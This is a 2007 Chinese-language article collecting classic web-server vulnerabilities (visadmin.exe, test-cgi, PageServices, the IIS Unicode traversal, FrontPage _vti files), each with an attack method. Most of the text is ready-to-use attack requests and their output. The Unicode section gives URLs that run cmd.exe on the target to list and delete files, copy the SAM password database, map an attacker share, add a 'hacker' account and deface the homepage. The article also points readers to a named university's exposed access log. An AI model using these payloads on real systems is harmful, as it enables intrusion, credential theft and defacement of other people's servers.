一些收集到的經(jīng)典漏洞詳解
更新時(shí)間:2007年01月16日 00:00:00 作者:
___________________________________________________________________________
☆visadmin.exe☆
這個(gè)漏洞可以在服務(wù)器中一直產(chǎn)生臨時(shí)文件知道服務(wù)器的硬盤慢了為止。任何人都可以遠(yuǎn)程的來完成。
使用使用在cgi-bin中默認(rèn)的 visadmin.exe (Visitor Administrator)
攻擊方法:
提交以下請(qǐng)求: http://www.targets.com/cgi-bin/visadmin.exe?user=guest
___________________________________________________________________________
☆no-such-file.pl☆
這個(gè)漏洞會(huì)暴露其服務(wù)器上的路徑,當(dāng)你訪問這個(gè)頁面時(shí)會(huì)顯示類似以下信息:
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
Can't open perl script "C:\InetPub\scripts\no-such-file.pl": No such file or
Directory
從此我們可以知道這個(gè)頁面的物理路徑為C:\InetPub\scripts\no-such-file.pl
攻擊方法:
訪問http://www.targets.com/cgi-bin/scripts/no-such-file.pl
___________________________________________________________________________
☆?PageServices☆
這個(gè)是可以顯示頁面清單的!運(yùn)氣好的話還可以得到用戶名和密碼?。ǘ际敲魑牡模?nbsp;
方法是url/?PageServices 還可以這樣試試
/?wp-cs-dump /?wp-ver-info /?wp-html-rend /?wp-usr-prop /?wp-ver-diff /?wp-verify-link /?wp-start-ver
/?wp-stop-ver /?wp-uncheckout
___________________________________________________________________________
☆test-cgi☆
test-cgi同樣是個(gè)常常出現(xiàn)的漏洞,在瀏覽器中輸入:
http://thegnome.com/cgi-bin/test-cgi?\whatever
將會(huì)返回:
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
再來一次,這樣輸入:
http://thegnome.com/
看到PASSWD了?
用netcat 80 端口 進(jìn)行攻擊:
machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
返回:
CGI/1.0 test script report:
argc is 1. argv is /\*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
顯示出了根目錄!這樣試試:
machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80
返回:
CGI/1.0 test script report:
argc is 1. argv is \*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger
cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html
mail-query mail-query-2 majordomo majordomo.cf marker.cgi
menu message.cgi munger.cgi munger.note ncsa-default.tar post-query
query smartlist.cf src subscribe.cf test-cgi uptime
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
顯示了/CGI-BIN/目錄下的東西
___________________________________________________________________________
☆unicode☆
列目錄:
http://ip/msadc/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir+c:\
http://www.victim.com/scripts/..Á../winnt/system32/cmd.exe?/c+dir+c:\
建立文件夾的命令
http://x.x.x.x/scripts/..Á../winnt/system32/cmd.exe?/c+md+c:\snowspider
刪除空的文件夾命令:
http://x.x.x.x/scripts/..Á../winnt/system32/cmd.exe?/c+rd+c:\snowspider
刪除文件的命令:
http://x.x.x.x/scripts/..Á../winnt/system32/cmd.exe?/c+del+c:\autoexec.bak
Copy文件
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/c+copy c:\winnt\repair\sam
._ c:\inetpub\wwwroot\
NET USE的使用
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/net.exe?/c+use+i:+\\myip\temp
改CMD方法
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe
+c:\inetpub\scripts\ccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\default.asp
顯示目標(biāo)主機(jī)當(dāng)前的環(huán)境變量
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/c+set
FIND命令使用
比如我要查看WEB目錄d:\inetpub\wwwroot下的所有asp、asa文件的內(nèi)容:
http://xxx.xxx.xxx.xxx/scripts/..Á..\winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.as*
顯示某一路徑下相同文件類型的文件內(nèi)容
http://xxx.xxx.xxx.xxx/scripts/..Á..\winnt/system32/find.exe?/n+/v+""+c:\inetpub\wwwroot\*.ht*
添加用戶命令
新建一個(gè)用戶名為hacker密碼為password的用戶:
http://xxx.xxx.xxx.xxx/script/cmd.exe?/c c:\winnt\system32\net.exe user hacker password /add
修改主頁
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd".exe?/c+echo+Hacked+by+hacker+
>+f:\wwwroot\xxx\default.asp
>+f:\wwwro'>http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd".exe?/c+echo+12/1/2k+>>+f:\wwwro
ot\xxx\default.asp
這樣,主頁就被更改成了:
Hacked by hacker
12/1/2k
關(guān)于更多的unicode漏洞可以在本論壇查找。
___________________________________________________________________________
☆_vti_inf.html☆
描述: web根目錄下存在_vti_inf.html文件,該文件是Frontpage extention server的特征,包含了一系列
Frontpage Extention Server的重要信息;而且Frontpage Extention server是一個(gè)有很多漏洞的web服務(wù),
用它入侵者可能直接修改首頁文件,如果你讀http://www.victim.com/_vti_inf.html你將得到FP extensions
的版本和它在服務(wù)器上的路徑. 還有一些密碼文件如:
http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd
具體如何利用呢,我輸入 www.hostname.com/_vti_inf.html ,然后查看
源文件,發(fā)現(xiàn)的東東如何利用?
解答:您可以先看看:http://www.shufe.edu.cn/
再看看:http://www.shufe.edu.cn/xcb/Server/logs/access_log
相關(guān)文章
網(wǎng)友舉報(bào):屁屁寬頻軟件自帶木馬病毒(圖)
網(wǎng)友舉報(bào):屁屁寬頻軟件自帶木馬病毒(圖)...2007-01-01關(guān)于對(duì)河南網(wǎng)通封鎖局域網(wǎng)共享上網(wǎng)的破解
關(guān)于對(duì)河南網(wǎng)通封鎖局域網(wǎng)共享上網(wǎng)的破解...2007-01-01找出通病 通殺國(guó)內(nèi)軟件防火墻的弱點(diǎn)
找出通病 通殺國(guó)內(nèi)軟件防火墻的弱點(diǎn)...2007-01-01